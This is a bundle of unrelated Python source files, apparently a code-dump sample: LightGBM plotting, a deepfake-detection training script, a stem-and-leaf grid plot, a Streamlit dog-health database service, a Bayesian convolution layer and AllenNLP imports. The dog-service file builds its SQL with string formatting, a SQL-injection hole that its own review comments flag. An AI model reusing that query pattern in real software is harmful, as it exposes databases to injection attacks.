        #pred_string=np.array_str(y_pred)
        #print (pred_string)
        #with open('pred_file.txt','w') as f:
        #    f.write(pred_string)
    print ('trying to plot here?')
    # plot_tree needs a working graphviz install (see module docstring above)
    #ax = lightgbm.plot_tree(clf, tree_index=83, show_info=['split_gain'])
    #ax = lightgbm.plot_tree(clf, tree_index=83, figsize=(500, 80), show_info=['split_gain'])
    # plt.show(ax)
    print('Plotte die Features')
    #graph1 = lightgbm.plot_importance(clf, max_num_features=10, name ='importance')
    #graph1.render(view=True)
    #plt.show(graph1)
    print('Plotte finalen Baum (1.)')
    graph2 = lightgbm.create_tree_digraph(clf, tree_index=0, name='<NAME>')
    graph2.render(view=True)
    plt.show(graph2)
    print('Plotte finalen Baum (72.)')
    graph3 = lightgbm.create_tree_digraph(clf, tree_index=71, name='Finale Baum')
    graph3.render(view=True)
    plt.show(graph3)
    # Observed results (multi-logloss, lower is better):
    #   2.40556 without Day and DayOfWeek [StandardConfig]
    #   2.40635 with Day and DayOfWeek [StandardConfig]
    #   2.40207 without Day and DayOfWeek - iteration 127 - rises afterwards - [StandardConfig]
    #   2.35994 without Day and DayOfWeek - iteration 63  - rises afterwards - [StandardConfig] + num_leaves = 1521
    #   2.35076 without Day and DayOfWeek - iteration 72  - rises afterwards - [StandardConfig] + num_leaves = 1000
# Kick off execution (runs on import; there is no __main__ guard). Keep at the bottom.
main()
|
import argparse
import random
import shutil
import tensorflow as tf
import tensorflow.keras as keras
import os
import Data
import Model
import time
from tensorflow.keras import backend as K
def makeDataList(files, train_end=750, val_end=875):
    """Shuffle each list file's lines into train/val/test splits.

    Generalized: the original hard-coded the 750/875 split points; they are now
    parameters with the same defaults, so existing callers behave identically.

    :param files: iterable of paths; each file contributes all of its lines.
    :param train_end: per-file number of training lines (default 750).
    :param val_end: per-file end index of validation lines (default 875);
        lines beyond it go to the test split.
    :return: (train, val, test) lists of raw lines, each globally shuffled.
    """
    train = []
    val = []
    test = []
    for file in files:
        with open(file, 'r') as f:
            data = f.readlines()
        # Shuffle within each file before slicing so the splits are random.
        random.shuffle(data)
        train += data[:train_end]
        val += data[train_end:val_end]
        test += data[val_end:]
    # Shuffle across files so batches mix sources.
    random.shuffle(train)
    random.shuffle(val)
    random.shuffle(test)
    return train, val, test
if __name__ == '__main__':
    # Silence TensorFlow's C++ and Python-side logging.
    os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
    tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
    # tf.keras.backend.set_floatx('float16')
    # os.environ['TF_AUTO_MIXED_PRECISION_GRAPH_REWRITE_IGNORE_PERFORMANCE'] = '1'
    # tf.keras.mixed_precision.set_global_policy('mixed_float16')

    # --- CLI ---
    parser = argparse.ArgumentParser()
    parser.add_argument("--augment", '-a', help="data augment", type=bool, default=True)
    parser.add_argument("--size", '-s', nargs=2, help="the size of frames", type=int, default=[224, 224])
    parser.add_argument("--message", '-m', help="commit", type=str, default="")
    parser.add_argument("--batchsize", '-b', help="batch size", type=int, default=1)
    parser.add_argument("--att", help="need att", type=str, default='proposed')
    parser.add_argument("--cnn", '-c', help="cnn archi", type=str, default='xcep')
    parser.add_argument("--rnn", '-r', help="rnn archi", type=str, default='convlstm')
    parser.add_argument("--frames", '-f', help="the nums of frames in one video", type=int, default=30)
    parser.add_argument("--fake", help="the fake image", type=str, default='df')
    parser.add_argument("--gpu", help="the num of gpu", type=str, default='0')
    args = parser.parse_args()

    gpu = args.gpu
    size: list = args.size
    batchSize = args.batchsize
    message = args.message
    cnn = args.cnn
    rnn = args.rnn
    frames = args.frames
    fakedata = args.fake
    att = args.att
    archi = cnn + rnn + att + "_frames" + str(frames) + "_"
    os.environ["CUDA_VISIBLE_DEVICES"] = gpu

    # Expand the --fake shorthand into the dataset folder prefix.
    if fakedata == 'df':
        fakedata = "Deepfakes"
    elif fakedata == 'fs':
        fakedata = "FaceSwap"
    elif fakedata == 'ff':
        fakedata = "Face2Face"
    elif fakedata == "nt":
        fakedata = "NeuralTextures"

    # --- Result folders: one run = one timestamped directory tree ---
    commit = message + archi + fakedata + time.strftime("%Y-%m-%d_%H:%M:%S", time.localtime())
    if not os.path.exists("./result"):
        os.mkdir("./result")
    resultsFolder = "./result/" + commit
    if not os.path.exists(resultsFolder):
        os.mkdir(resultsFolder)
    checkpointsFolder = os.path.join(resultsFolder, "./checkpoints")
    if not os.path.exists(checkpointsFolder):
        os.mkdir(checkpointsFolder)
    logsFolder = os.path.join(resultsFolder, "logs")
    if not os.path.exists(logsFolder):
        os.mkdir(logsFolder)
    codeFolder = os.path.join(resultsFolder, "code")
    if not os.path.exists(codeFolder):
        os.mkdir(codeFolder)
    # Snapshot the source files used for this run, for reproducibility.
    codeFiles = os.listdir("./")
    for codeFile in codeFiles:
        if codeFile.split(".")[-1] == "py":
            shutil.copy(codeFile, codeFolder)
    with open(resultsFolder + "/info", 'w') as f:
        f.writelines(str(args))

    # --- Data ---
    dataFolder = "/data/ltm/keras/dataFile"
    # folders = ["Deepfakes0", "Face2Face0", "FaceSwap0", "NeuralTextures0",
    #            "youtube0", "youtube1", "youtube2", "youtube3"]
    folders = [fakedata + "0", "youtube0"]
    if fakedata == "all":
        folders = ["Deepfakes0", "Face2Face0", "FaceSwap0", "NeuralTextures0",
                   "youtube0", "youtube1", "youtube2", "youtube3"]
    dataFolder = [os.path.join(dataFolder, folder) for folder in folders]
    train, val, test = makeDataList(dataFolder)
    with open(resultsFolder + "/test_data_list", 'w') as f:
        f.writelines(test)
    trainSet = Data.MyData(train, "train", batchSize, shape=tuple(size), num=frames)
    valSet = Data.MyData(val, "val", batchSize, shape=tuple(size), num=frames)

    # --- Model ---
    # BUG FIX: the original used `inputShape = size.append(3)`; list.append()
    # returns None, so inputShape was always None (and `size` was mutated).
    inputShape = size + [3]
    model = Model.getModel(cnn=cnn, rnn=rnn, att=att, inputShape=inputShape, frames=frames)
    optim = tf.keras.optimizers.Adam(learning_rate=0.00001,
                                     beta_1=0.9, beta_2=0.999, epsilon=1e-07, amsgrad=False, name='Adam')
    loss = tf.keras.losses.BinaryCrossentropy()  # NOTE(review): unused; compile() uses the string name
    model.compile(optimizer=optim, loss="binary_crossentropy",
                  metrics=['acc'], run_eagerly=False)
    callbacks = [
        tf.keras.callbacks.ModelCheckpoint(filepath=os.path.join(checkpointsFolder, 'model.{epoch:02d}-{val_loss:.2f}.h5'), save_weights_only=True),
        tf.keras.callbacks.TensorBoard(log_dir=logsFolder),
    ]
    model.build((None, frames, 224, 224, 3))
    print(model.summary())
    model.fit(x=trainSet, callbacks=callbacks, epochs=200, validation_data=valSet,
              verbose=1, initial_epoch=0, validation_freq=1,
              max_queue_size=10, workers=4, use_multiprocessing=False)
|
"""grid.py. row and col facets."""
import stemgraphic.alpha as alpha
import stemgraphic.num as num
from stemgraphic.num import density_plot
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
from warnings import warn
def small_multiples(
    df,
    var,
    aggregation=False,
    axes=None,
    bins=None,
    box=None,
    cols=None,
    col_labels=None,
    density=False,
    density_fill=True,
    display=750,
    fit=None,
    flip_axes=False,
    hist=None,
    hues=None,
    hue_labels=None,
    jitter=None,
    legend="on",
    limit_var=False,
    norm_hist=None,
    plot_function=None,
    random_state=None,
    reverse=False,
    rows=None,
    row_labels=None,
    rug=None,
    singular=True,
    shared_stem=False,
    stem_display=True,
    stem_order=1,
    stem_skip=0,
    strip=None,
    x_min=0,
    x_max=None,
):
    """Draw a grid of small-multiple distribution plots of ``df[var]``.

    One subplot is drawn per (row category, column category) pair, using
    stem-and-leaf plots (stemgraphic), density/histogram plots, or a
    caller-supplied ``plot_function``.

    :param df: list, numpy array, time series, pandas or dask dataframe
    :param var: column to plot; object (string) columns are factorized to
        integer codes first
    :param aggregation: passed through to ``stem_graphic``
    :param axes: pre-built matplotlib axes; when ``None`` a new figure is made
    :param bins: passed through to ``density_plot``
    :param box: passed through to ``density_plot``
    :param cols: column name whose categories define the grid columns
    :param col_labels: labels for the column categories (defaults to values)
    :param density: if True, draw density plots and disable stem display
    :param density_fill: passed through to ``density_plot``
    :param display: passed through to ``density_plot``
    :param fit: passed through to ``density_plot``
    :param flip_axes: passed through to ``num.stem_graphic``
    :param hist: passed through to ``density_plot``
    :param hues: column name whose categories define the legend entries
    :param hue_labels: labels for the hue categories (defaults to values)
    :param jitter: passed through to ``density_plot``
    :param legend: "on", "top" (legend row above the grid), or falsy for none
    :param limit_var: restrict axis limits to the variable's observed range
    :param norm_hist: passed through to ``density_plot``
    :param plot_function: alternative plotting callable ``f(data, ax=...)``
    :param random_state: passed through to ``density_plot``
    :param reverse: not used in this function; kept for interface stability
    :param rows: column name whose categories define the grid rows
    :param row_labels: labels for the row categories (defaults to values)
    :param rug: passed through to ``density_plot``
    :param singular: not used in this function; kept for interface stability
    :param shared_stem: use back-to-back stem-and-leaf plots (requires an
        even number of column categories)
    :param stem_display: show stem-and-leaf plots (forced off when density)
    :param stem_order: not used in this function; kept for interface stability
    :param stem_skip: not used in this function; kept for interface stability
    :param strip: passed through to ``density_plot``
    :param x_min: x axis minimum
    :param x_max: x axis maximum
    :return: (figure, axes, series filtered to the last cell's mask)
    """
    # Density mode replaces stem-and-leaf display entirely.
    if density:
        stem_display = None
    # Non-numeric columns are factorized to integer codes in a new
    # "<var>_code" column; note this mutates the caller's dataframe.
    if df[var].dtypes == "object":
        df[var + "_code"] = pd.Categorical(df[var])
        df[var + "_code"] = df[var + "_code"].cat.codes.astype("int64")
        var = var + "_code"
    legend_title = "per {}".format(cols) if cols else ""
    legend_title += " per {}".format(rows) if rows else ""
    legend_title += " per {}".format(hues) if hues else ""
    # Facet categories; "all" stands in when a facet dimension is unused.
    hue_categories = sorted(df[hues].dropna().unique()) if hues else ["all"]
    row_categories = sorted(df[rows].dropna().unique()) if rows else ["all"]
    col_categories = sorted(df[cols].dropna().unique()) if cols else ["all"]
    hue_labels = hue_labels if hue_labels else hue_categories
    row_labels = row_labels if row_labels else row_categories
    col_labels = col_labels if col_labels else col_categories
    # legend == "top" reserves one extra subplot row for the legend.
    if legend == "top":
        offset = 1
    else:
        offset = 0
    nb_rows = len(row_categories)
    nb_cols = len(col_categories)
    if nb_cols == 0:
        nb_cols = 1
    if shared_stem and stem_display:
        # Back-to-back stems pair adjacent columns, hence the even count.
        if nb_cols % 2 != 0:
            warn(
                "Column variable has to have an even number of categories to use back to back stem-and-leaf plots."
            )
            return None
        adjustmentx = 2
        adjustmenty = nb_rows
        sharex = False
    else:
        adjustmentx = 1
        adjustmenty = nb_rows + 0.5
        sharex = False
    # NOTE(review): when `axes` is passed in, `fig` is never assigned but is
    # returned at the end — likely NameError; confirm intended usage.
    if axes is None:
        fig, (axes) = plt.subplots(
            nb_rows + offset,
            nb_cols,
            sharex=sharex,
            sharey=True,
            figsize=(nb_rows * 4 * adjustmentx, nb_cols * 4 * adjustmenty),
        )
    plt.suptitle("Distribution of {}".format(var), ha="center", fontsize=16)
    # Pick the anchor axes for the legend depending on grid dimensionality.
    if nb_rows + offset > 1 and nb_cols > 1:
        # multidim = "xy"
        ax0 = axes[0][0]
        ax = axes[0][1]
    elif nb_rows + offset > 1:
        # multidim = "y"
        ax0 = axes[0]
        ax = None
    else:
        # multidim = "x"
        ax0 = axes[0]
    if legend == "top":
        # Hide the reserved legend row and draw proxy points to label hues.
        ax0.axis("off")
        ax0.axes.set_ylim(0, 0.01)
        ax0.set_title(legend_title, loc="left")
        for i, val in enumerate(hue_categories):
            ax0.scatter(
                (i), (0.11), marker="s"
            )  # outside viewing area, just to generate a legend with squares
    if legend == "top":
        ax0.legend(
            hue_labels, ncol=3, loc="center", fontsize="medium", frameon=False
        )
    max_max = 0
    for k, colval in enumerate(col_categories):
        # For back-to-back stems, odd columns reuse the previous column's
        # axes as the secondary side.
        if k % 2 == 1 and shared_stem and stem_display:
            ax2 = ax
        # NOTE(review): `nb_rows - offset` here vs `nb_rows + offset` used
        # when the figure was built — verify this asymmetry is intentional.
        if nb_cols > 1 and nb_rows - offset > 1:
            ax = [i[k] for i in axes]
        elif nb_cols > 1 and (nb_rows - offset) == 1:
            ax = list(axes[k:])
        elif nb_cols > 1:
            ax = list(axes[k])
        else:
            ax = axes
        for j, rowval in enumerate(row_categories):
            max_peak = 0
            loc = "center" if stem_display else "left"
            if rows and cols:
                ax[j + offset].set_title(
                    row_labels[j] + " " + col_labels[k], loc=loc, va="top"
                )
            elif cols:
                ax[j + offset].set_title(col_labels[k], loc=loc, va="top")
            else:
                ax[j + offset].set_title(row_labels[j], loc=loc, va="top")
            # Build the boolean mask selecting this facet cell's data.
            # NOTE(review): if neither `rows` nor `cols` is given,
            # `full_filter` is never assigned — NameError below; confirm.
            if cols:
                col_filter = df[cols] == colval
            if rows:
                row_filter = df[rows] == rowval
            if rows and cols:
                full_filter = row_filter & col_filter
            elif rows:
                full_filter = row_filter
            elif cols:
                full_filter = col_filter
            to_plot = df[full_filter]
            if len(to_plot) > 0:
                # Even columns (k == 0 case) only stash the data; the
                # following odd column draws both sides back-to-back.
                if k == 0 and stem_display and shared_stem:
                    secondary_to_plot = to_plot
                elif stem_display:
                    if to_plot[var].dtype.name == "object":
                        if shared_stem:
                            alpha.stem_graphic(
                                to_plot[var].to_frame("word"),
                                secondary_to_plot[var].to_frame("word"),
                                aggregation=aggregation,
                                ax=ax[j + offset],
                                ax2=ax2[j + offset],
                            )
                        else:
                            alpha.stem_graphic(
                                to_plot[var].to_frame("word"), ax=ax[j + offset]
                            )
                    else:
                        if shared_stem:
                            f, a = num.stem_graphic(
                                to_plot,
                                secondary_to_plot,
                                aggregation=aggregation,
                                ax=ax[j + offset],
                                ax2=ax2[j + offset],
                                column=var,
                                flip_axes=flip_axes,
                            )
                        else:
                            f, a = num.stem_graphic(
                                to_plot,
                                aggregation=aggregation,
                                ax=ax[j + offset],
                                column=var,
                                flip_axes=flip_axes,
                            )
                elif plot_function:
                    plot_function(to_plot, ax=ax[j + offset])
                else:
                    # Density/histogram fallback; track the tallest peak so
                    # all cells can share a common y limit afterwards.
                    _, ax[j + offset], max_peak, _, _ = density_plot(
                        to_plot,
                        var=var,
                        ax=ax[j + offset],
                        bins=bins,
                        box=box,
                        density=density,
                        density_fill=density_fill,
                        display=display,
                        fit=fit,
                        fig_only=False,
                        hist=hist,
                        hues=hues,
                        jitter=jitter,
                        legend=False if legend == "top" else legend,
                        limit_var=limit_var,
                        norm_hist=norm_hist,
                        random_state=random_state,
                        rug=rug,
                        strip=strip,
                        x_min=x_min,
                        x_max=x_max,
                    )
                    ax[j + offset].axes.get_yaxis().set_visible(False)
                    ax[j + offset].axes.set_xlabel("")
                    if max_peak > max_max:
                        max_max = max_peak
            if limit_var:
                true_min = df[var][full_filter].dropna().min()
                true_max = df[var][full_filter].dropna().max()
                if stem_display:
                    if flip_axes:
                        ax[j + offset].set_xlim(true_min, true_max)
                        ax[j + offset].set_ylim(0, true_max * 2)
                    else:
                        ax[j + offset].set_xlim(0, true_max * 2)
                        ax[j + offset].set_ylim(true_min, true_max)
            if x_min and x_max:
                ax[j + offset].set_xlim(x_min, x_max)
            if density or hist or rug:
                ax[j + offset].set_ylim(0, max_max + 0.005)
    if legend != "top" and legend:
        ax[0].legend(
            hue_labels, ncol=3, loc="upper right", fontsize="medium", frameon=False
        )
    plt.box(False)
    sns.despine(left=True, bottom=True, top=True, right=True)
    if not density or (shared_stem and stem_display):
        plt.tight_layout()
    # Returns the mask of the LAST cell only — a quirk callers should know.
    return fig, axes, df[var][full_filter]
|
<gh_stars>1-10
import datetime
import os
from io import BytesIO, StringIO
from logging import error
import pandas as pd
import psycopg2
import streamlit as st
from matplotlib import pyplot as plt
from pandas import DataFrame as df
from PIL import Image
# streamlit run /Users/apple/Documents/GitHub/SummerSession_2021/DogService.py
# Initialize connection.
# Uses st.cache to only run once.
# @st.cache(allow_output_mutation=True, hash_funcs={"_thread.RLock": lambda _: None})
def init_connection():
    """Open a PostgreSQL connection using credentials from Streamlit secrets."""
    credentials = st.secrets["postgres"]
    return psycopg2.connect(**credentials)
# Module-level connection shared by every query helper below.
conn = init_connection()
# Perform query.
# Uses st.cache to only rerun when the query changes or after 10 min.
# @st.cache(ttl=600)
def run_query(query):
    """Execute a read-only SQL *query* and return all result rows."""
    with conn.cursor() as cur:
        cur.execute(query)
        rows = cur.fetchall()
    return rows
def execute_sql(insert):
    """Execute a data-modifying SQL statement and commit it.

    NOTE(review): callers build statements via str.format — SQL-injection
    prone; prefer ``cur.execute(sql, params)`` with parameter binding.
    """
    with conn.cursor() as cur:
        cur.execute(insert)
        conn.commit()
def get_all_dogs():
    """Return every dog as a DataFrame indexed by ``id``.

    Columns: name, resign, birthday, gender ('male'/'female'), species.
    The male flag stored as 1/0 in the DB is mapped to a readable label.
    """
    dog_entries = run_query("SELECT * from dogs;")
    # Row layout by position: id, name, resign, birthday, male-flag, species.
    # One records comprehension replaces the original six parallel
    # append-lists; explicit `columns` keeps the empty-table case working
    # (set_index('id') would otherwise fail on a column-less frame).
    records = [
        {
            'id': r[0],
            'name': r[1],
            'resign': r[2],
            'birthday': r[3],
            'gender': 'male' if r[4] == 1 else 'female',
            'species': r[5],
        }
        for r in dog_entries
    ]
    columns = ['id', 'name', 'resign', 'birthday', 'gender', 'species']
    return df(records, columns=columns).set_index(['id'])
def get_dogs_by_name(name):
    """Return the subset of dogs whose name equals *name*."""
    all_dogs = get_all_dogs()
    name_mask = all_dogs['name'] == name
    return all_dogs[name_mask]
def resign_dogs(name,birthday,male,species):
    """Register a new dog; the ``resign`` timestamp is set to now().

    NOTE(review): values interpolated with str.format — SQL-injection prone;
    prefer parameterized queries.
    """
    x = '''
    insert into dogs (name, resign, birthday, male, species) VALUES
    (\'{}\',now(),\'{}\',{},\'{}\');
    '''.format(name,birthday,male,species)
    execute_sql(x)
    # Debug echo of the executed statement.
    print(x)
    print('done!')
def delete_dogs(name):
    """Delete every dog row whose name equals *name*.

    NOTE(review): str.format interpolation — SQL-injection prone.
    """
    execute_sql('''
    delete from dogs where name=\'{}\';
    '''.format(name))
def get_dog_id_by_name(name):
    """Return the id(s) of the dog(s) named *name*.

    BUG FIX: ``get_all_dogs`` sets ``id`` as the DataFrame index, so the
    original column lookup ``['id']`` always raised KeyError. The ids live
    on the index of the filtered frame.
    """
    return get_dogs_by_name(name).index
def add_temperature(dog_id,temperature):
    """Insert a temperature reading for *dog_id* timestamped now()."""
    execute_sql('''
    insert into temperature (temperature, dog_id, time) VALUES
    ({},\'{}\',now());
    '''.format(temperature,dog_id))
def get_temperature(dog_id):
    """Return a DataFrame of (temperature, time) readings for *dog_id*,
    ordered oldest first."""
    rows = run_query('select temperature,time from temperature where dog_id={} order by time;'.format(dog_id))
    temperatures = [row[0] for row in rows]
    times = [row[1] for row in rows]
    return df({
        'temperature': temperatures,
        'time': times
    })
def add_gesture(dog_id,gesture):
    """Insert a gesture observation for *dog_id* timestamped now()."""
    execute_sql('''
    insert into gesture (gesture, dog_id, time) VALUES
    (\'{}\',\'{}\',now());
    '''.format(gesture,dog_id))
def get_gesture(dog_id):
    """Return a DataFrame of (gesture, time) entries for *dog_id*, oldest first."""
    q = run_query('select gesture,time from gesture where dog_id={} order by time;'.format(dog_id))
    ges_list = []
    time_list = []
    for e in q:
        ges_list.append(e[0])
        time_list.append(e[1])
    return df({
        'gesture':ges_list,
        'time':time_list
    })
def add_weight(dog_id,weight):
    """Insert a weight measurement for *dog_id* timestamped now()."""
    execute_sql('''
    insert into weight (weight, dog_id, time) VALUES
    ({},\'{}\',now());
    '''.format(weight,dog_id))
def get_weight(dog_id):
    """Return a DataFrame of (weight, time) measurements for *dog_id*, oldest first."""
    q = run_query('select weight,time from weight where dog_id={} order by time;'.format(dog_id))
    wei_list = []
    time_list = []
    for e in q:
        wei_list.append(e[0])
        time_list.append(e[1])
    return df({
        'weight':wei_list,
        'time':time_list
    })
def add_heart_rate(dog_id,heart_rate):
    """Insert a heart-rate reading for *dog_id* timestamped now()."""
    execute_sql('''
    insert into heart_rate (heart_rate, dog_id, time) VALUES
    ({},\'{}\',now());
    '''.format(heart_rate,dog_id))
def get_heart_rate(dog_id):
    """Return a DataFrame of (heart_rate, time) readings for *dog_id*, oldest first."""
    q = run_query('select heart_rate,time from heart_rate where dog_id={} order by time;'.format(dog_id))
    rat_list = []
    time_list = []
    for e in q:
        rat_list.append(e[0])
        time_list.append(e[1])
    return df({
        'heart_rate':rat_list,
        'time':time_list
    })
def add_respire_rate(dog_id,respire_rate):
    """Insert a respiration-rate reading for *dog_id* timestamped now()."""
    execute_sql('''
    insert into respire_rate (respire_rate, dog_id, time) VALUES
    ({},\'{}\',now());
    '''.format(respire_rate,dog_id))
def get_respire_rate(dog_id):
    """Return a DataFrame of (respire_rate, time) readings for *dog_id*, oldest first."""
    q = run_query('select respire_rate,time from respire_rate where dog_id={} order by time;'.format(dog_id))
    temp_list = []
    time_list = []
    for e in q:
        temp_list.append(e[0])
        time_list.append(e[1])
    return df({
        'respire_rate':temp_list,
        'time':time_list
    })
def add_photo(dog_id,dir):
    """Store the image file at path *dir* as a BLOB for dog *dog_id*.

    BUG FIX: ``execute_sql`` accepts a single SQL string, but the original
    call passed the values as extra positional arguments (TypeError) and
    never interpolated them into the statement. The binary literal produced
    by ``psycopg2.Binary`` is also no longer wrapped in extra quotes.
    """
    with open(dir,'rb') as f:
        img_buffer = f.read()
    binaryCoding = psycopg2.Binary(img_buffer)
    execute_sql('''
    insert into dog_photo(picture, dog_id, time) VALUES
    ({},\'{}\',now());
    '''.format(binaryCoding,dog_id))
def get_photo(dog_id):
    """Return a DataFrame of (picture, time) for *dog_id*, oldest first,
    with each picture decoded into a PIL Image.

    BUG FIX: the original queried the ``respire_rate`` table (copy-paste
    from ``get_respire_rate``); photos live in ``dog_photo.picture``.
    """
    q = run_query('select picture,time from dog_photo where dog_id={} order by time;'.format(dog_id))
    photo_list = []
    time_list = []
    for e in q:
        # Decode the stored BLOB back into an image object.
        photo_list.append(Image.open(BytesIO(e[0])))
        time_list.append(e[1])
    return df({
        'picture':photo_list,
        'time':time_list
    })
if __name__ == '__main__':
    # Manual smoke-test hooks, left disabled so importing this module
    # (e.g. from the Streamlit app) performs no database writes.
    # print(get_all_dogs())
    # resign_dogs('Gammago','2017-4-9','false','Hashiqi')
    # print('execute!')
    pass
|
<filename>torchbnn/modules/conv.py
import math
import torch
import torch.nn.init as init
from torch.nn import Module, Parameter
import torch.nn.functional as F
from torch.nn.modules.utils import _single, _pair, _triple
class _BayesConvNd(Module):
    r"""
    Applies Bayesian Convolution

    Weights (and optionally biases) are distributions parameterized by a
    mean (``*_mu``) and a log standard deviation (``*_log_sigma``) rather
    than point estimates; subclasses sample them in ``forward``.

    Arguments:
        prior_mu (Float): mean of prior normal distribution.
        prior_sigma (Float): sigma of prior normal distribution.

    .. note:: other arguments are following conv of pytorch 1.2.0.
    https://github.com/pytorch/pytorch/blob/master/torch/nn/modules/conv.py
    """
    __constants__ = ['prior_mu', 'prior_sigma', 'stride', 'padding', 'dilation',
                     'groups', 'bias', 'padding_mode', 'output_padding', 'in_channels',
                     'out_channels', 'kernel_size']
    def __init__(self, prior_mu, prior_sigma, in_channels, out_channels, kernel_size, stride,
                 padding, dilation, transposed, output_padding,
                 groups, bias, padding_mode):
        super(_BayesConvNd, self).__init__()
        if in_channels % groups != 0:
            raise ValueError('in_channels must be divisible by groups')
        if out_channels % groups != 0:
            raise ValueError('out_channels must be divisible by groups')
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.kernel_size = kernel_size
        self.stride = stride
        self.padding = padding
        self.dilation = dilation
        self.transposed = transposed
        self.output_padding = output_padding
        self.groups = groups
        self.padding_mode = padding_mode
        self.prior_mu = prior_mu
        self.prior_sigma = prior_sigma
        # Cached for initializing *_log_sigma tensors in reset_parameters.
        self.prior_log_sigma = math.log(prior_sigma)
        # Transposed convs swap the in/out channel axes of the kernel,
        # mirroring torch.nn._ConvNd.
        if transposed:
            self.weight_mu = Parameter(torch.Tensor(
                in_channels, out_channels // groups, *kernel_size))
            self.weight_log_sigma = Parameter(torch.Tensor(
                in_channels, out_channels // groups, *kernel_size))
            # weight_eps holds a frozen noise sample (see freeze()); None
            # means "resample on every forward pass".
            self.register_buffer('weight_eps', None)
        else:
            self.weight_mu = Parameter(torch.Tensor(
                out_channels, in_channels // groups, *kernel_size))
            self.weight_log_sigma = Parameter(torch.Tensor(
                out_channels, in_channels // groups, *kernel_size))
            self.register_buffer('weight_eps', None)
        # Unlike torch.nn.Module, self.bias here is a plain bool flag, not
        # a Parameter; the parameters are bias_mu / bias_log_sigma.
        if bias is None or bias is False :
            self.bias = False
        else :
            self.bias = True
        if self.bias:
            self.bias_mu = Parameter(torch.Tensor(out_channels))
            self.bias_log_sigma = Parameter(torch.Tensor(out_channels))
            self.register_buffer('bias_eps', None)
        else:
            # Register as None so state_dict round-trips keep the slots.
            self.register_parameter('bias_mu', None)
            self.register_parameter('bias_log_sigma', None)
            self.register_buffer('bias_eps', None)
        self.reset_parameters()
    def reset_parameters(self):
        # Initialization method of Adv-BNN.
        # NOTE(review): uses kernel_size[0] ** 2 for fan-in — assumes a
        # square kernel; confirm behavior for non-square kernel sizes.
        n = self.in_channels
        n *= self.kernel_size[0] ** 2
        stdv = 1.0 / math.sqrt(n)
        self.weight_mu.data.uniform_(-stdv, stdv)
        self.weight_log_sigma.data.fill_(self.prior_log_sigma)
        if self.bias :
            self.bias_mu.data.uniform_(-stdv, stdv)
            self.bias_log_sigma.data.fill_(self.prior_log_sigma)
        # Initialization method of the original torch nn.conv.
        # init.kaiming_uniform_(self.weight_mu, a=math.sqrt(5))
        # self.weight_log_sigma.data.fill_(self.prior_log_sigma)
        # if self.bias :
        #     fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight_mu)
        #     bound = 1 / math.sqrt(fan_in)
        #     init.uniform_(self.bias_mu, -bound, bound)
        #     self.bias_log_sigma.data.fill_(self.prior_log_sigma)
    def freeze(self) :
        # Fix one noise sample so subsequent forwards are deterministic.
        self.weight_eps = torch.randn_like(self.weight_log_sigma)
        if self.bias :
            self.bias_eps = torch.randn_like(self.bias_log_sigma)
    def unfreeze(self) :
        # Return to resampling fresh noise on every forward pass.
        self.weight_eps = None
        if self.bias :
            self.bias_eps = None
    def extra_repr(self):
        # Mirrors torch.nn._ConvNd.extra_repr, prefixed with the prior.
        s = ('{prior_mu}, {prior_sigma}'
             ', {in_channels}, {out_channels}, kernel_size={kernel_size}'
             ', stride={stride}')
        if self.padding != (0,) * len(self.padding):
            s += ', padding={padding}'
        if self.dilation != (1,) * len(self.dilation):
            s += ', dilation={dilation}'
        if self.output_padding != (0,) * len(self.output_padding):
            s += ', output_padding={output_padding}'
        if self.groups != 1:
            s += ', groups={groups}'
        if self.bias is False:
            s += ', bias=False'
        return s.format(**self.__dict__)
    def __setstate__(self, state):
        # Backward compatibility for checkpoints pickled before
        # padding_mode existed.
        super(_BayesConvNd, self).__setstate__(state)
        if not hasattr(self, 'padding_mode'):
            self.padding_mode = 'zeros'
class BayesConv2d(_BayesConvNd):
    r"""
    Applies Bayesian Convolution for 2D inputs

    Arguments:
        prior_mu (Float): mean of prior normal distribution.
        prior_sigma (Float): sigma of prior normal distribution.

    .. note:: other arguments are following conv of pytorch 1.2.0.
    https://github.com/pytorch/pytorch/blob/master/torch/nn/modules/conv.py
    """
    def __init__(self, prior_mu, prior_sigma, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros'):
        # Normalize scalar arguments to 2-tuples, as torch.nn.Conv2d does.
        kernel_size = _pair(kernel_size)
        stride = _pair(stride)
        padding = _pair(padding)
        dilation = _pair(dilation)
        super(BayesConv2d, self).__init__(
            prior_mu, prior_sigma, in_channels, out_channels, kernel_size, stride,
            padding, dilation, False, _pair(0), groups, bias, padding_mode)
    def conv2d_forward(self, input, weight):
        # Sample the bias via the reparameterization trick:
        # bias = mu + sigma * eps, with eps either fresh noise or the
        # frozen sample stored by freeze().
        if self.bias:
            if self.bias_eps is None :
                bias = self.bias_mu + torch.exp(self.bias_log_sigma) * torch.randn_like(self.bias_log_sigma)
            else :
                bias = self.bias_mu + torch.exp(self.bias_log_sigma) * self.bias_eps
        else :
            bias = None
        # Circular padding must be applied manually before F.conv2d,
        # matching the torch.nn.Conv2d implementation.
        if self.padding_mode == 'circular':
            expanded_padding = ((self.padding[1] + 1) // 2, self.padding[1] // 2,
                                (self.padding[0] + 1) // 2, self.padding[0] // 2)
            return F.conv2d(F.pad(input, expanded_padding, mode='circular'),
                            weight, bias, self.stride,
                            _pair(0), self.dilation, self.groups)
        return F.conv2d(input, weight, bias, self.stride,
                        self.padding, self.dilation, self.groups)
    def forward(self, input):
        r"""
        Overriden.

        Samples a weight tensor (mu + sigma * eps) and applies the 2D
        convolution; when frozen, the stored eps makes this deterministic.
        """
        if self.weight_eps is None :
            weight = self.weight_mu + torch.exp(self.weight_log_sigma) * torch.randn_like(self.weight_log_sigma)
        else :
            weight = self.weight_mu + torch.exp(self.weight_log_sigma) * self.weight_eps
        return self.conv2d_forward(input, weight)
from typing import Dict, Union
import logging
from overrides import overrides
import numpy as np
from allennlp.common.checks import ConfigurationError
from allennlp.common.file_utils import cached_path
from allennlp.common.util import START_SYMBOL, END_SYMBOL
from allennlp.data.dataset_readers.dataset_reader import DatasetReader
from allennlp.data.fields import TextField, LabelField, ArrayField, MetadataField
from allennlp.data.instance import Instance
from allennlp.data.tokenizers import Token, Tokenizer
from allennlp.data.token_indexers import TokenIndexer, SingleIdTokenIndexer
from matchmaker.dataloaders.transformer_tokenizer import *
from blingfire import *
import torch
import random
